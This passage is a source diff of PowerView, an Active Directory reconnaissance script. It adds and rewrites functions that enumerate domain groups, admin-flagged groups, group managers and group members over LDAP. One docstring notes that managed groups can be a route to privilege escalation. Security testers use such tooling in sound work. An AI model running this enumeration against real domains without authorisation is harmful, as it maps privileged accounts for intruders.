+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [OutputType('PowerView.Group')]
+    [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+        [String[]]
+        $Identity,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('UserName')]
         [String]
-        $SID,
+        $MemberIdentity,
 
+        [Switch]
+        $AdminCount,
+
+        [ValidateNotNullOrEmpty()]
         [String]
-        $UserName,
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $Filter,
+        $LDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $Domain,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $ADSpath,
+        $SearchScope = 'Subtree',
 
-        [Switch]
-        $AdminCount,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [Switch]
-        $FullData,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-        [Switch]
-        $RawSids,
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
 
         [Switch]
-        $AllTypes,
+        $Tombstone,
 
-        [ValidateRange(1,10000)]
-        [Int]
-        $PageSize = 200,
+        [Alias('ReturnOne')]
+        [Switch]
+        $FindOne,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
+
+        [Switch]
+        $Raw
     )
 
-    begin {
-        $GroupSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
-        if (!$AllTypes)
-        {
-          $Filter += "(groupType:1.2.840.113556.1.4.803:=2147483648)"
-        }
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $GroupSearcher = Get-DomainSearcher @SearcherArguments
     }
 
-    process {
-        if($GroupSearcher) {
+    PROCESS {
+        if ($GroupSearcher) {
+            if ($PSBoundParameters['MemberIdentity']) {
 
-            if($AdminCount) {
-                Write-Verbose "Checking for adminCount=1"
-                $Filter += "(admincount=1)"
-            }
+                if ($SearcherArguments['Properties']) {
+                    $OldProperties = $SearcherArguments['Properties']
+                }
 
-            if ($UserName) {
-                # get the raw user object
-                $User = Get-ADObject -SamAccountName $UserName -Domain $Domain -DomainController $DomainController -Credential $Credential -ReturnRaw -PageSize $PageSize | Select-Object -First 1
+                $SearcherArguments['Identity'] = $MemberIdentity
+                $SearcherArguments['Raw'] = $True
 
-                if($User) {
-                    # convert the user to a directory entry
-                    $UserDirectoryEntry = $User.GetDirectoryEntry()
+                Get-DomainObject @SearcherArguments | ForEach-Object {
+                    # convert the user/group to a directory entry
+                    $ObjectDirectoryEntry = $_.GetDirectoryEntry()
 
-                    # cause the cache to calculate the token groups for the user
-                    $UserDirectoryEntry.RefreshCache("tokenGroups")
+                    # cause the cache to calculate the token groups for the user/group
+                    $ObjectDirectoryEntry.RefreshCache('tokenGroups')
 
-                    $UserDirectoryEntry.TokenGroups | ForEach-Object {
+                    $ObjectDirectoryEntry.TokenGroups | ForEach-Object {
                         # convert the token group sid
                         $GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value
 
                         # ignore the built in groups
-                        if($GroupSid -notmatch '^S-1-5-32-.*') {
-                            if($FullData) {
-                                $Group = Get-ADObject -SID $GroupSid -PageSize $PageSize -Domain $Domain -DomainController $DomainController -Credential $Credential
-                                $Group.PSObject.TypeNames.Add('PowerView.Group')
+                        if ($GroupSid -notmatch '^S-1-5-32-.*') {
+                            $SearcherArguments['Identity'] = $GroupSid
+                            $SearcherArguments['Raw'] = $False
+                            if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }
+                            $Group = Get-DomainObject @SearcherArguments
+                            if ($Group) {
+                                $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group')
                                 $Group
                             }
-                            else {
-                                if($RawSids) {
-                                    $GroupSid
-                                }
-                                else {
-                                    Convert-SidToName -SID $GroupSid
-                                }
-                            }
                         }
                     }
                 }
-                else {
-                    Write-Warning "UserName '$UserName' failed to resolve."
-                }
             }
             else {
-                if ($SID) {
-                    $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)"
+                $IdentityFilter = ''
+                $Filter = ''
+                $Identity | Where-Object {$_} | ForEach-Object {
+                    $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                    if ($IdentityInstance -match '^S-1-') {
+                        $IdentityFilter += "(objectsid=$IdentityInstance)"
+                    }
+                    elseif ($IdentityInstance -match '^CN=') {
+                        $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                    }
+                    elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+                        $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+                        $IdentityFilter += "(objectguid=$GuidByteString)"
+                    }
+                    elseif ($IdentityInstance.Contains('\')) {
+                        $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+                        if ($ConvertedIdentityInstance) {
+                            $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+                            $GroupName = $IdentityInstance.Split('\')[1]
+                            $IdentityFilter += "(samAccountName=$GroupName)"
+                            $SearcherArguments['Domain'] = $GroupDomain
+                            Write-Verbose "[Get-DomainGroup] Extracted domain '$GroupDomain' from '$IdentityInstance'"
+                            $GroupSearcher = Get-DomainSearcher @SearcherArguments
+                        }
+                    }
+                    else {
+                        $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance))"
+                    }
                 }
-                else {
-                    $GroupSearcher.filter = "(&(objectCategory=group)(samaccountname=$GroupName)$Filter)"
+
+                if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                    $Filter += "(|$IdentityFilter)"
+                }
+
+                if ($PSBoundParameters['AdminCount']) {
+                    Write-Verbose '[Get-DomainGroup] Searching for adminCount=1'
+                    $Filter += '(admincount=1)'
                 }
+                if ($PSBoundParameters['LDAPFilter']) {
+                    Write-Verbose "[Get-DomainGroup] Using additional LDAP filter: $LDAPFilter"
+                    $Filter += "$LDAPFilter"
+                }
+
+                $GroupSearcher.filter = "(&(objectCategory=group)$Filter)"
+                Write-Verbose "[Get-DomainGroup] filter string: $($GroupSearcher.filter)"
 
-                $Results = $GroupSearcher.FindAll()
+                if ($PSBoundParameters['FindOne']) { $Results = $GroupSearcher.FindOne() }
+                else { $Results = $GroupSearcher.FindAll() }
                 $Results | Where-Object {$_} | ForEach-Object {
-                    # if we're returning full data objects
-                    if ($FullData) {
-                        # convert/process the LDAP fields for each result
-                        $Group = Convert-LDAPProperty -Properties $_.Properties
-                        $Group.PSObject.TypeNames.Add('PowerView.Group')
-                        $Group
+                    if ($PSBoundParameters['Raw']) {
+                        # return raw result objects
+                        $Group = $_
                     }
                     else {
-                        # otherwise we're just returning the group name
-                        $_.properties.samaccountname
+                        $Group = Convert-LDAPProperty -Properties $_.Properties
+                    }
+                    $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group')
+                    $Group
+                }
+                if ($Results) {
+                    try { $Results.dispose() }
+                    catch {
+                        Write-Verbose "[Get-DomainGroup] Error disposing of the Results object"
                     }
                 }
-                $Results.dispose()
                 $GroupSearcher.dispose()
             }
         }
@@ -5255,208 +8716,731 @@ function Get-NetGroup {
 }
 
 
-function Get-NetGroupMember {
+function New-DomainGroup {
 <#
-    .SYNOPSIS
-
-        This function users [ADSI] and LDAP to query the current AD context
-        or trusted domain for users in a specified group. If no GroupName is
-        specified, it defaults to querying the "Domain Admins" group.
-        This is a replacement for "net group 'name' /domain"
+.SYNOPSIS
 
-    .PARAMETER GroupName
+Creates a new domain group (assuming appropriate permissions) and returns the group object.
 
-        The group name to query for users.
+TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
 
-    .PARAMETER SID
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-PrincipalContext  
 
-        The Group SID to query for users. If not given, it defaults to 512 "Domain Admins"
+.DESCRIPTION
 
-    .PARAMETER Filter
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.GroupPrincipal with the specified
+group properties.
 
-        A customized ldap filter string to use, e.g. "(description=*admin*)"
+.PARAMETER SamAccountName
 
-    .PARAMETER Domain
+Specifies the Security Account Manager (SAM) account name of the group to create.
+Maximum of 256 characters. Mandatory.
 
-        The domain to query for group users, defaults to the current domain.
+.PARAMETER Name
 
-    .PARAMETER DomainController
+Specifies the name of the group to create. If not provided, defaults to SamAccountName.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER DisplayName
 
-    .PARAMETER ADSpath
+Specifies the display name of the group to create. If not provided, defaults to SamAccountName.
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER Description
 
-    .PARAMETER FullData
+Specifies the description of the group to create.
 
-        Switch. Returns full data objects instead of just group/users.
+.PARAMETER Domain
 
-    .PARAMETER Recurse
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
 
-        Switch. If the group member is a group, recursively try to query its members as well.
+.PARAMETER Credential
 
-    .PARAMETER UseMatchingRule
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query when -Recurse is specified.
-        Much faster than manual recursion, but doesn't reveal cross-domain groups.
+.EXAMPLE
 
-    .PARAMETER PageSize
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'
 
-        The PageSize to set for the LDAP searcher object.
+Creates the 'TestGroup' group with the specified description.
 
-    .PARAMETER Credential
+.EXAMPLE
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred
 
-    .EXAMPLE
+Creates the 'TestGroup' group with the specified description using the specified alternate credentials.
 
-        PS C:\> Get-NetGroupMember
-        
-        Returns the usernames that of members of the "Domain Admins" domain group.
+.OUTPUTS
 
-    .EXAMPLE
-
-        PS C:\> Get-NetGroupMember -Domain testing -GroupName "Power Users"
-        
-        Returns the usernames that of members of the "Power Users" group in the 'testing' domain.
+DirectoryServices.AccountManagement.GroupPrincipal
+#>
 
-    .LINK
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('DirectoryServices.AccountManagement.GroupPrincipal')]
+    Param(
+        [Parameter(Mandatory = $True)]
+        [ValidateLength(0, 256)]
+        [String]
+        $SamAccountName,
 
-        http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/
-#>
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Name,
 
-    [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $GroupName,
+        $DisplayName,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $SID,
+        $Description,
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    $ContextArguments = @{
+        'Identity' = $SamAccountName
+    }
+    if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+    if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
+    $Context = Get-PrincipalContext @ContextArguments
+
+    if ($Context) {
+        $Group = New-Object -TypeName System.DirectoryServices.AccountManagement.GroupPrincipal -ArgumentList ($Context.Context)
+
+        # set all the appropriate group parameters
+        $Group.SamAccountName = $Context.Identity
+
+        if ($PSBoundParameters['Name']) {
+            $Group.Name = $Name
+        }
+        else {
+            $Group.Name = $Context.Identity
+        }
+        if ($PSBoundParameters['DisplayName']) {
+            $Group.DisplayName = $DisplayName
+        }
+        else {
+            $Group.DisplayName = $Context.Identity
+        }
+
+        if ($PSBoundParameters['Description']) {
+            $Group.Description = $Description
+        }
+
+        Write-Verbose "[New-DomainGroup] Attempting to create group '$SamAccountName'"
+        try {
+            $Null = $Group.Save()
+            Write-Verbose "[New-DomainGroup] Group '$SamAccountName' successfully created"
+            $Group
+        }
+        catch {
+            Write-Warning "[New-DomainGroup] Error creating group '$SamAccountName' : $_"
+        }
+    }
+}
+
+
+function Get-DomainManagedSecurityGroup {
+<#
+.SYNOPSIS
+
+Returns all security groups in the current (or target) domain that have a manager set.
+
+Author: Stuart Morgan (@ukstufus) <stuart.morgan@mwrinfosecurity.com>, Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl  
+
+.DESCRIPTION
+
+Authority to manipulate the group membership of AD security groups and distribution groups
+can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically
+used to delegate management authority to distribution groups, but Windows supports security groups
+being managed in the same way.
+
+This function searches for AD groups which have a group manager set, and determines whether that
+user can manipulate group membership. This could be a useful method of horizontal privilege
+escalation, especially if the manager can manipulate the membership of a privileged group.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv
+
+Store a list of all security groups with managers in group-managers.csv
+
+.OUTPUTS
+
+PowerView.ManagedSecurityGroup
+
+A custom PSObject describing the managed security group.
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.ManagedSecurityGroup')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $DomainController,
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $ADSpath,
+        $SearchBase,
 
-        [Switch]
-        $FullData,
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
 
-        [Switch]
-        $Recurse,
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-        [Switch]
-        $UseMatchingRule,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ServerTimeLimit,
+
+        [Switch]
+        $Tombstone,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    begin {
-        if($DomainController) {
-            $TargetDomainController = $DomainController
-        }
-        else {
-            $TargetDomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name
-        }
+    BEGIN {
+        $SearcherArguments = @{
+            'LDAPFilter' = '(&(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))'
+            'Properties' = 'distinguishedName,managedBy,samaccounttype,samaccountname'
+        }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+    }
 
-        if($Domain) {
+    PROCESS {
+        if ($PSBoundParameters['Domain']) {
+            $SearcherArguments['Domain'] = $Domain
             $TargetDomain = $Domain
         }
         else {
-            $TargetDomain = Get-NetDomain -Credential $Credential | Select-Object -ExpandProperty name
+            $TargetDomain = $Env:USERDNSDOMAIN
+        }
+
+        # go through the list of security groups on the domain and identify those who have a manager
+        Get-DomainGroup @SearcherArguments | ForEach-Object {
+            $SearcherArguments['Properties'] = 'distinguishedname,name,samaccounttype,samaccountname,objectsid'
+            $SearcherArguments['Identity'] = $_.managedBy
+            $Null = $SearcherArguments.Remove('LDAPFilter')
+
+            # $SearcherArguments
+            # retrieve the object that the managedBy DN refers to
+            $GroupManager = Get-DomainObject @SearcherArguments
+            # Write-Host "GroupManager: $GroupManager"
+            $ManagedGroup = New-Object PSObject
+            $ManagedGroup | Add-Member Noteproperty 'GroupName' $_.samaccountname
+            $ManagedGroup | Add-Member Noteproperty 'GroupDistinguishedName' $_.distinguishedname
+            $ManagedGroup | Add-Member Noteproperty 'ManagerName' $GroupManager.samaccountname
+            $ManagedGroup | Add-Member Noteproperty 'ManagerDistinguishedName' $GroupManager.distinguishedName
+
+            # determine whether the manager is a user or a group
+            if ($GroupManager.samaccounttype -eq 0x10000000) {
+                $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'Group'
+            }
+            elseif ($GroupManager.samaccounttype -eq 0x30000000) {
+                $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'User'
+            }
+
+            $ACLArguments = @{
+                'Identity' = $_.distinguishedname
+                'RightsFilter' = 'WriteMembers'
+            }
+            if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server }
+            if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope }
+            if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize }
+            if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit }
+            if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone }
+            if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential }
+
+            # # TODO: correct!
+            # # find the ACLs that relate to the ability to write to the group
+            # $xacl = Get-DomainObjectAcl @ACLArguments -Verbose
+            # # $ACLArguments
+            # # double-check that the manager
+            # if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AceType -eq 'AccessAllowed' -and ($xacl.ObjectSid -eq $GroupManager.objectsid)) {
+            #     $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $True
+            # }
+            # else {
+            #     $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $False
+            # }
+
+            $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' 'UNKNOWN'
+
+            $ManagedGroup.PSObject.TypeNames.Insert(0, 'PowerView.ManagedSecurityGroup')
+            $ManagedGroup
         }
+    }
+}
+
+
+function Get-DomainGroupMember {
+<#
+.SYNOPSIS
+
+Return the members of a specific domain group.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID  
+
+.DESCRIPTION
+
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for the specified
+group matching the criteria. Each result is then rebound and the full user
+or group object is returned.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for. Wildcards accepted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER Recurse
+
+Switch. If the group member is a group, recursively try to query its members as well.
+
+.PARAMETER RecurseUsingMatchingRule
+
+Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.
+Much faster than manual recursion, but doesn't reveal cross-domain groups,
+and only returns user accounts (no nested group objects themselves).
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainGroupMember "Desktop Admins"
+
+GroupDomain             : testlab.local
+GroupName               : Desktop Admins
+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain            : testlab.local
+MemberName              : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass       : group
+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain             : testlab.local
+GroupName               : Desktop Admins
+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain            : testlab.local
+MemberName              : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass       : user
+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112
+
+.EXAMPLE
+
+'Desktop Admins' | Get-DomainGroupMember -Recurse
+
+GroupDomain             : testlab.local
+GroupName               : Desktop Admins
+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain            : testlab.local
+MemberName              : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass       : group
+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain             : testlab.local
+GroupName               : Testing Group
+GroupDistinguishedName  : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberDomain            : testlab.local
+MemberName              : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass       : user
+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain             : testlab.local
+GroupName               : Desktop Admins
+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain            : testlab.local
+MemberName              : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass       : user
+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112
+
+.EXAMPLE
+
+Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule
+
+GroupDomain             : testlab.local
+GroupName               : Desktop Admins
+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain            : testlab.local
+MemberName              : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass       : user
+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain             : testlab.local
+GroupName               : Desktop Admins
+GroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain            : testlab.local
+MemberName              : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass       : user
+MemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112
+
+.EXAMPLE
+
+Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember
+
+.EXAMPLE
+
+'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'
+
+.EXAMPLE
+
+Get-Domain | Select-Object -Expand name
+testlab.local
+
+'dev\domain admins' | Get-DomainGroupMember -Verbose
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainGroupMember] Extracted domain 'dev.testlab.local' from 'dev\domain admins'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))
+
+GroupDomain             : dev.testlab.local
+GroupName               : Domain Admins
+GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain            : dev.testlab.local
+MemberName              : user1
+MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass       : user
+MemberSID               : S-1-5-21-339048670-1233568108-4141518690-201108
+
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))
+GroupDomain             : dev.testlab.local
+GroupName               : Domain Admins
+GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain            : dev.testlab.local
+MemberName              : Administrator
+MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass       : user
+MemberSID               : S-1-5-21-339048670-1233568108-4141518690-500
+
+.OUTPUTS
+
+PowerView.GroupMember
+
+Custom PSObject with translated group member property fields.
+
+.LINK
+
+http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [OutputType('PowerView.GroupMember')]
+    [CmdletBinding(DefaultParameterSetName = 'None')]
+    Param(
